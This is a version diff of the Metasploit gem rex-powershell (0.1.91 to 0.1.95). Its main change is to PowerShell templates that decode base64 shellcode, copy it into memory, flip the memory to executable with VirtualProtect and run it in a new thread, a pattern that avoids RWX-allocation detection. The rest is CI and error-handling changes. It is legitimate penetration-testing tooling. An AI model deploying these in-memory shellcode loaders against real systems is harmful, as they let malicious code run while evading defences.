rex-powershell 0.1.91 → 0.1.95
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/.github/workflows/verify.yml +46 -0
- data/data/templates/to_mem_dotnet.ps1.template +10 -5
- data/data/templates/to_mem_pshreflection.ps1.template +17 -15
- data/lib/rex/powershell/command.rb +4 -4
- data/lib/rex/powershell/exceptions.rb +16 -0
- data/lib/rex/powershell/obfu.rb +3 -3
- data/lib/rex/powershell/output.rb +2 -2
- data/lib/rex/powershell/payload.rb +2 -3
- data/lib/rex/powershell/script.rb +1 -1
- data/lib/rex/powershell/version.rb +1 -1
- data/lib/rex/powershell.rb +1 -0
- data.tar.gz.sig +0 -0
- metadata +4 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: bf167124561f5b5aa34b7b5117293e8d977a0c6c0efd936b450c3b3c605ee1c5
|
4
|
+
data.tar.gz: 91381dc9267c0f19c43be9bbc399928ab759427aff764e2682a0362abc05f0ba
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: d9659e411b02341fcb7a34f75a69a3b3237fd4619d6a51eab6914a695731497302bab232ea11ca9997f5c7cf05996eefb1e46e27e5edf7957d050853e16143c2
|
7
|
+
data.tar.gz: f7758453f3f03d28ff3a63270ffd6b7c1ae5a9a5890a66cf3334a76ad0db87db12f304319afa472ff29a6b5a7f9515957e7aaaf84a8116fa6d2d3fd06564b1f0
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
@@ -0,0 +1,46 @@
|
|
1
|
+
name: Verify
|
2
|
+
|
3
|
+
on:
|
4
|
+
push:
|
5
|
+
branches:
|
6
|
+
- '*'
|
7
|
+
pull_request:
|
8
|
+
branches:
|
9
|
+
- '*'
|
10
|
+
|
11
|
+
jobs:
|
12
|
+
test:
|
13
|
+
runs-on: ubuntu-18.04
|
14
|
+
timeout-minutes: 40
|
15
|
+
|
16
|
+
strategy:
|
17
|
+
fail-fast: true
|
18
|
+
matrix:
|
19
|
+
ruby:
|
20
|
+
- 2.5
|
21
|
+
- 2.6
|
22
|
+
- 2.7
|
23
|
+
- 3.0
|
24
|
+
test_cmd:
|
25
|
+
- bundle exec rspec
|
26
|
+
|
27
|
+
env:
|
28
|
+
RAILS_ENV: test
|
29
|
+
|
30
|
+
name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
|
31
|
+
steps:
|
32
|
+
- name: Checkout code
|
33
|
+
uses: actions/checkout@v2
|
34
|
+
|
35
|
+
- name: Setup Ruby
|
36
|
+
uses: ruby/setup-ruby@v1
|
37
|
+
with:
|
38
|
+
ruby-version: ${{ matrix.ruby }}
|
39
|
+
bundler-cache: true
|
40
|
+
|
41
|
+
- name: ${{ matrix.test_cmd }}
|
42
|
+
run: |
|
43
|
+
echo "${CMD}"
|
44
|
+
bash -c "${CMD}"
|
45
|
+
env:
|
46
|
+
CMD: ${{ matrix.test_cmd }}
|
@@ -5,9 +5,10 @@ $%{var_syscode} = @"
|
|
5
5
|
namespace %{var_kernel32} {
|
6
6
|
public class func {
|
7
7
|
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
|
8
|
-
[Flags] public enum MemoryProtection {
|
8
|
+
[Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
|
9
9
|
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
|
10
10
|
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
11
|
+
[DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
|
11
12
|
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
12
13
|
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
|
13
14
|
}
|
@@ -21,10 +22,14 @@ $%{var_compileParams}.GenerateInMemory = $True
|
|
21
22
|
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
|
22
23
|
|
23
24
|
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
25
|
+
[Uint32]$%{var_opf} = 0
|
24
26
|
|
25
|
-
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::
|
27
|
+
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ReadWrite)
|
26
28
|
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
|
27
29
|
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
|
28
|
-
|
29
|
-
if ([
|
30
|
-
$%{
|
30
|
+
|
31
|
+
if ([%{var_kernel32}.func]::VirtualProtect($%{var_baseaddr},[Uint32]$%{var_code}.Length + 1, [%{var_kernel32}.func+MemoryProtection]::Execute, [Ref]$%{var_opf}) -eq $true ) {
|
32
|
+
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
33
|
+
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
|
34
|
+
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
|
35
|
+
}
|
@@ -1,27 +1,29 @@
|
|
1
1
|
function %{func_get_proc_address} {
|
2
|
-
|
3
|
-
|
2
|
+
Param ($%{var_module}, $%{var_procedure})
|
3
|
+
$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
|
4
4
|
|
5
|
-
|
5
|
+
return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
|
6
6
|
}
|
7
7
|
|
8
8
|
function %{func_get_delegate_type} {
|
9
|
-
|
10
|
-
|
11
|
-
|
12
|
-
|
9
|
+
Param (
|
10
|
+
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
|
11
|
+
[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
|
12
|
+
)
|
13
13
|
|
14
|
-
|
15
|
-
|
16
|
-
|
14
|
+
$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
|
15
|
+
$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
16
|
+
$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
17
17
|
|
18
|
-
|
18
|
+
return $%{var_type_builder}.CreateType()
|
19
19
|
}
|
20
20
|
|
21
21
|
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
22
|
+
[Uint32]$%{var_opf} = 0
|
23
|
+
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x04)
|
22
24
|
|
23
|
-
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
|
24
25
|
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
|
25
|
-
|
26
|
-
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
|
27
|
-
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
|
26
|
+
if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualProtect), (%{func_get_delegate_type} @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($%{var_buffer}, [Uint32]$%{var_code}.Length, 0x10, [Ref]$%{var_opf})) -eq $true) {
|
27
|
+
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
|
28
|
+
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
|
29
|
+
}
|
@@ -293,11 +293,11 @@ EOS
|
|
293
293
|
# @return [String] Powershell command line with payload
|
294
294
|
def self.cmd_psh_payload(pay, payload_arch, template_path, opts = {})
|
295
295
|
if opts[:encode_inner_payload] && opts[:encode_final_payload]
|
296
|
-
fail
|
296
|
+
fail Exceptions::PowershellError, ':encode_inner_payload and :encode_final_payload are incompatible options'
|
297
297
|
end
|
298
298
|
|
299
299
|
if opts[:no_equals] && !opts[:encode_final_payload]
|
300
|
-
fail
|
300
|
+
fail Exceptions::PowershellError, ':no_equals requires :encode_final_payload option to be used'
|
301
301
|
end
|
302
302
|
|
303
303
|
psh_payload = case opts[:method]
|
@@ -310,7 +310,7 @@ EOS
|
|
310
310
|
when 'msil'
|
311
311
|
Rex::Powershell::Payload.to_win32pe_psh_msil(template_path, pay)
|
312
312
|
else
|
313
|
-
fail
|
313
|
+
fail Exceptions::PowershellError, 'No Powershell method specified'
|
314
314
|
end
|
315
315
|
|
316
316
|
if opts[:exec_rc4]
|
@@ -405,7 +405,7 @@ EOS
|
|
405
405
|
end
|
406
406
|
|
407
407
|
if command.length > 8191
|
408
|
-
fail
|
408
|
+
fail Exceptions::PowershellCommandLengthError, 'Powershell command length is greater than the command line maximum (8192 characters)'
|
409
409
|
end
|
410
410
|
|
411
411
|
command
|
data/lib/rex/powershell/obfu.rb
CHANGED
@@ -67,7 +67,7 @@ module Powershell
|
|
67
67
|
# Deobfuscate a Powershell literal string value that was previously obfuscated by #scate_string_literal.
|
68
68
|
#
|
69
69
|
# @param [String] string The obfuscated Powershell expression to deobfuscate.
|
70
|
-
# @raises [
|
70
|
+
# @raises [Exceptions::PowershellError] If the string can not be deobfuscated, for example because it was randomized using a
|
71
71
|
# different routine, then an exception is raised.
|
72
72
|
# @return [String] The string literal value.
|
73
73
|
def self.descate_string_literal(string)
|
@@ -79,14 +79,14 @@ module Powershell
|
|
79
79
|
format = Regexp.last_match(0)
|
80
80
|
format_args = string[format.length..-1].strip
|
81
81
|
unless format_args =~ /-f\s*('.',\s*)*('.')/
|
82
|
-
raise
|
82
|
+
raise Exceptions::PowershellError, 'The obfuscated string structure is unsupported'
|
83
83
|
end
|
84
84
|
format_args = format_args[2..-1].strip.scan(/'(.)'/).map { |match| match[0] }
|
85
85
|
string = format[1...-1].strip
|
86
86
|
end
|
87
87
|
|
88
88
|
unless string =~ /^'.*'$/
|
89
|
-
raise
|
89
|
+
raise Exceptions::PowershellError, 'The obfuscated string structure is unsupported'
|
90
90
|
end
|
91
91
|
string = string.gsub(/'\s*\+\s*'/, '') # process all concatenation operations
|
92
92
|
unless format_args.nil? # process all format string operations
|
@@ -146,7 +146,7 @@ module Powershell
|
|
146
146
|
elsif @code =~ /FromBase64String(\((?>[^)(]+|\g<1>)*\))/
|
147
147
|
encoded_stream = Obfu.descate_string_literal(Regexp.last_match(1))
|
148
148
|
else
|
149
|
-
raise
|
149
|
+
raise Exceptions::PowershellError, 'Failed to identify the base64 data'
|
150
150
|
end
|
151
151
|
|
152
152
|
# Decode and decompress the string
|
@@ -157,7 +157,7 @@ module Powershell
|
|
157
157
|
begin
|
158
158
|
@code = Rex::Text.zlib_inflate(unencoded)
|
159
159
|
rescue Zlib::DataError => e
|
160
|
-
raise
|
160
|
+
raise Exceptions::PowershellError, 'Invalid compression'
|
161
161
|
end
|
162
162
|
end
|
163
163
|
|
@@ -37,10 +37,10 @@ module Payload
|
|
37
37
|
def self.to_win32pe_psh(template_path = TEMPLATE_DIR, code)
|
38
38
|
hash_sub = {}
|
39
39
|
hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
|
40
|
-
hash_sub[:var_win32_func]
|
40
|
+
hash_sub[:var_win32_func] = Rex::Text.rand_text_alpha(rand(8)+8)
|
41
41
|
hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
|
42
42
|
hash_sub[:var_size] = Rex::Text.rand_text_alpha(rand(8)+8)
|
43
|
-
hash_sub[:var_rwx]
|
43
|
+
hash_sub[:var_rwx] = Rex::Text.rand_text_alpha(rand(8)+8)
|
44
44
|
hash_sub[:var_iter] = Rex::Text.rand_text_alpha(rand(8)+8)
|
45
45
|
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
|
46
46
|
|
@@ -55,7 +55,6 @@ module Payload
|
|
55
55
|
# Originally from PowerSploit
|
56
56
|
#
|
57
57
|
def self.to_win32pe_psh_reflection(template_path = TEMPLATE_DIR, code)
|
58
|
-
# Intialize rig and value names
|
59
58
|
rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
|
60
59
|
rig.init_var(:func_get_proc_address)
|
61
60
|
rig.init_var(:func_get_delegate_type)
|
data/lib/rex/powershell.rb
CHANGED
data.tar.gz.sig
CHANGED
Binary file
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: rex-powershell
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.1.
|
4
|
+
version: 0.1.95
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Metasploit Hackers
|
@@ -93,7 +93,7 @@ cert_chain:
|
|
93
93
|
EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
|
94
94
|
9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
|
95
95
|
-----END CERTIFICATE-----
|
96
|
-
date:
|
96
|
+
date: 2022-02-14 00:00:00.000000000 Z
|
97
97
|
dependencies:
|
98
98
|
- !ruby/object:Gem::Dependency
|
99
99
|
name: rake
|
@@ -173,6 +173,7 @@ executables: []
|
|
173
173
|
extensions: []
|
174
174
|
extra_rdoc_files: []
|
175
175
|
files:
|
176
|
+
- ".github/workflows/verify.yml"
|
176
177
|
- ".gitignore"
|
177
178
|
- ".rspec"
|
178
179
|
- ".travis.yml"
|
@@ -188,6 +189,7 @@ files:
|
|
188
189
|
- data/templates/to_mem_rc4.ps1.template
|
189
190
|
- lib/rex/powershell.rb
|
190
191
|
- lib/rex/powershell/command.rb
|
192
|
+
- lib/rex/powershell/exceptions.rb
|
191
193
|
- lib/rex/powershell/function.rb
|
192
194
|
- lib/rex/powershell/obfu.rb
|
193
195
|
- lib/rex/powershell/output.rb
|
metadata.gz.sig
CHANGED
Binary file
|